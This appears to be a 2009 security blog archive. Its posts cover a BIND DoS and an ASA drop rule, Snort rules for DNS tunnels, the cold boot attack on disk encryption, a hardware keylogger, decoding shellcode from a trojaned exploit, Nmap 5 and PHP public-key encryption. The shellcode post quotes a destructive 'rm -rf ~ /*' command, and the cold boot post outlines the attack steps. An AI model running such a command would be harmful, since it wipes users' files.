New remote DOS for ISC BIND (DNS) just announced:
https://www.isc.org/node/474
securityfocus has a poc:
http://downloads.securityfocus.com/vulnerabilities/exploits/35848.txt
if i got all my bits straight this should drop and log those packets in a cisco asa firewall:
policy-map type inspect dns preset_dns_map
match header-flag eq 0×2800
drop log
Archive for July, 2009
Remote DOS for Bind in circulation
Tuesday, July 28th, 2009Snort rules for Iodine Covert DNS Tunnel Detection
Sunday, July 26th, 2009I created two Snort IDS rules to detect covert Iodine tunnels. Frequently in corporate environment and WIFI hotspots, DNS is not blocked at the firewalls and is allowed to flow to the internet while other type of traffic is restricted. Iodine lets users take advantage of this fact and allow tunneling IPv4 traffic over DNS queries. These Snort rules were tested with Iodine version 0.4.2, I’m very interested in getting feedback on how the rules are working (or not for you) or how I could make them better. You can find the Iodine Snort rules at this location: http://www.securitywire.com/snort_rules/iodine.rules
Open Hack Policy
Saturday, July 25th, 2009The Open Hack Policy (OHP), grants an ethical hacker permission to practice their penetration testing skills or new shiny tools on a participating domain. Vulnerabilities found via the OHP should be credited to the individual that discovered them on the site’s OHP page. If you run a website and/or domain, and the policy seems to be a good match for you then you are encouraged to use the OHP on your domain(s) and make sure to let us know what work and what doesn’t for you so we can update the policy accordingly. The OHP should be a living document and will be continually updated and improved. The Goal behind the OHP is to promote ethical hacking and responsible disclosure to domain operators that want to opt-in the OHP. Collaboration between ethical hackers and domain operators should be beneficial to both parties.
More details on the OHP: Open Hack Policy.
HNN The Hacker News Network
Saturday, July 25th, 2009If you have been around the security scene for a while then you should well remember HNN the hacker news network and Space Rogue from the l0pht heavy industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for a full launch on 01/11/10. . HNN was always a good source of the latest news in the security world and will be quite refreshing to see what they have in store for us this time around! The new video format for HNN should be interesting. Check out there web site and be ready for the return!
IE and Visual Studio out of band patch from Microsoft next Tuesday
Friday, July 24th, 2009Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and possibly already being exploited since Microsoft has not been deviating much for their patch Tuesday schedule recently. They hint that customers that are already up to date with security updates are not vulnerable to known attack so this could be more about fixing the source of a known issue to prevent exploitation from other attack vectors. The bulletin points out that developers will have to keep an eye out for any applications that use this vulnerable functionality and take action to mitigate this risk.
Keep an eye on the buletin at: http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
Bypassing whole disk encryption using the coldboot technique
Monday, July 20th, 2009The cold boot technique is a technique pioneered at Princeton a few months back that can be used to recover among many other things the keys used to do whole disk encryption. The team at Princeton has a good video explaining how the technique works here: http://citp.princeton.edu/memory/.
The technique is actually pretty straight forward, rapidly terminate a running (or hibernating) machine and get it to boot your usb thumbstick asap (this can also be done over the network via PXE). Once the thumbstick boots up with their tiny piece of software, the software simply dump all memory to a file on the usb stick. Once complete you are free to go to any other machine with your thumbstick and analyze this dump file with any of your favorite forensic tools. Many treasures can be unearthed by analyzing this dump but to make it easier to find AES and RSA encryption keys in the memory dump, the team also provides 2 tools for the job. The whole disk encryption key is only one of the many thing an attacker will have access to after having access to a memory dump. All running programs, lmhash passwords, files in memory, etc will be recoverable using common disk forensic tools.
Last but not least, and perhaps the most interesting aspect of their research is that they found out is that they were able to make the memory stay around in RAM for up to 10 minutes at a time by cooling down the dram chips in the computer before abruptly terminating it. In their demo they were able to use common dust spray cans to cool down the memory sufficiently. Their numbers were for warm DRAM chips were more around the seconds to minutes range depending on many factors. It maybe a good idea to test your machines to see how much data you can recover from memory after a cold boot so you can determine how vulnerable they are to this technique.
To mitigate this risk you should layer encryption of very sensitive documents by using file or virtual disk encryption within your encrypted drive. Remember that whole disk encryption should only be one of multiple layers, reduce the risk of this physical threat by combining whole disk encryption with physical security measures. Shutting down the machine completely when possible may also be a good idea.
KeeLog – DIY hardware PS/2 wireless keylogger
Sunday, July 19th, 2009KeeLog has nice online article on how to build a hardware ps/2 wireless keylogger. Sounds like a fun project and maybe someday I’ll have time to tackle it. The article comes with full instructions on how to build the transmitter and receiver. They also include a windows driver to make the receiver act as a virtual COM port so data can be monitored using any standard terminal application that supports serial ports.
Decoding and Disassembling Shellcode
Saturday, July 18th, 2009xyberpix from the SecuriTeam blog posted an entry this week about a trojaned exploit that was provided by a supporter of the Anti-Sec movement. The blog entry in question can be found here: SecuriTeam Blogs » 0pen0wn.c = Nasty. xyberpix didnt really care about what he was running and didnt get a full understanding before running the code. Turns out that the code does a “rm -rf ~ /* 2> /dev/null &” which deletes everything from the users home directory followed by the whole hard drive and redirects any errors to the void (/dev/null). All this is happening in the background because of the & at the end of the statement. The malicious command was hidden in shell code and I was curious as to what it was doing so I wrote this small shell script to decode the shell code:
#!/usr/bin/perl
# shellcode2bin
# mail: merc from the domain securitywire.com
while($line = <STDIN>)
{
chomp($line);
$line =~ s/[^xabcdef0-9]//gis;
@bytes = split /x/, $line;
shift(@bytes);
foreach (@bytes)
{
printf "%c", hex $_;
}
}
To run this script assuming you put the above code in a file named “ShellCodeDecode” and the shellcode you want to decode is in a file named “shellcode” you would type this at your command prompt:
./ShellCodeDecode < shellcode > output
This will extract the shell code and put it in a file named output. For the SecuriTeam blog entry nothing further needed to be done to find the malicious “rm -rf ~ /* 2> /dev/null &” command. However for normal shellcode your output would be raw binary shellcode which you should be able to convert back to readable assembly code by using a dissasembler such as ndisasm from the nasm assembler:
ndisasm -b 32 output | less
Keep in mind that you need to know what processor the bytecode was for and dissasemble for that processor and bit size. That’s it, now you can actually see what that bytecode would actually do before running it!!
Nmap 5.00 Released this week!
Saturday, July 18th, 2009The Nmap 5.00 network mapper (often refered to as just a port scanner) has been released this week, it is a major release like we haven’t seen in quite a few years. This new release now includes a few extra tools that were not present in prior versions of nmap. Most notably a new tool called Ncat aim to replace the venerable netcat and adds many new features that were not available in netcat such has SSL and IPv6 support. Additionally the Zenmap GUI has been updated with a number of features including a neat graphical network topology feature. Fyodor (main developer for nmap) has spent the summer scanning the internet and doing so was able to improve nmap performance dramatically. Bottom line is that you will want to update to nmap 5 if you haven’t already! Happy network mapping!
Storing sensitive information using public key encryption in PHP
Friday, July 17th, 2009To encrypt your sensitive information using public key encryption (also known as asymetric encryption), first you will need to install OpenSSL and generate a key pair in PEM format. I will not cover how to install OpenSSL, details on installing OpenSSL can be found at: http://www.openssl.org/
Once you have installed OpenSSL you will want to use it to generate both a private and public key.
To generate your private key use the following command:
openssl genrsa -aes256 -out private.pem 2048This will genarate a private key named “private.pem”. Make sure to keep this key in a secure location, ideally not on the web, application or database server. Keeping the private key on a couple usb drives would be a good idea so you can simply use it off the usb drive when needed to decrypt data and have a few extra usb keys as backups. If you lose the private key, you will not be able to retrieve the encrypted information. While generating your public key, make sure to use a strong pass-phrase as it will be the last line of defence in protecting your private key. Your private key is the key to the kingdom, once someone has access to it, they will be able to decrypt any information that was encrypted using your public key.
Next generate a public key using the following command:
openssl rsa -in private.pem -out public.pem -outform PEM -puboutThis will generate the public key in a file named public.pem. This public key will be used to encrypt your sensitive information. This public key is not sensitive information and can be shared with anyone and put on your web server. Only the corresponding private key will be able to decrypt information that was encrypted with this public key. Once you have generated the public key you will want to put it on your web server so you can encrypt your sensitive information with it.
To encrypt information in php using your newly generated public key you will want to use the openssl_pkey_get_public() and openssl_public_encrypt() functions. Simply, the first function loads the pem file containing your public key and the second function encrypt your data into a variable using your public key. Here is an example on how to do so:
<?php
$string = "data to encrypt";
// public.pem key needs to point to a valid path or url where your public key is located
$publickey = openssl_pkey_get_public (file_get_contents("public.pem"));
// this encrypts input $string into $crypt_output using $publickey
openssl_public_encrypt($string, $crypt_output, $publickey);
// this outputs the encrypted data in binary format
echo $crypt_output;
?>$crypt_output is in a binary format, if you plan on storing it in a database text field such as char or varchar then you will want to base64 encode the data first using base64_encode(). For optimal performance, you should load the public key once and use it across request but this code snippet is simplified for demonstration purposes.
Finally to decrypt your data (here we are assuming the data is in a file named “cipher”), you would issue the following command to decrypt it using your private key:
openssl rsautl -decrypt -inkey private.pem -in cipherIf you decided to base64 encode your data, make sure to base64 decode it before feeding it to openssl. Ideally you would decrypt that data somewhere outside your web server or database server for further processing using openssl but if you would also like to do it in php (web or cli), it’s also possible to use openssl_pkey_get_private() and openssl_private_decrypt() from within php (pretty much just like the public key encryption example) to decrypt information.
This is the general idea on how public key encryption can be used in php to securely store data on your servers and later decrypt it at another location using the private key. Even if your server gets compromised and the public key and encrypted data is available to attackers they would not be able to decrypt the information using today’s technology if they do not have access to your private key.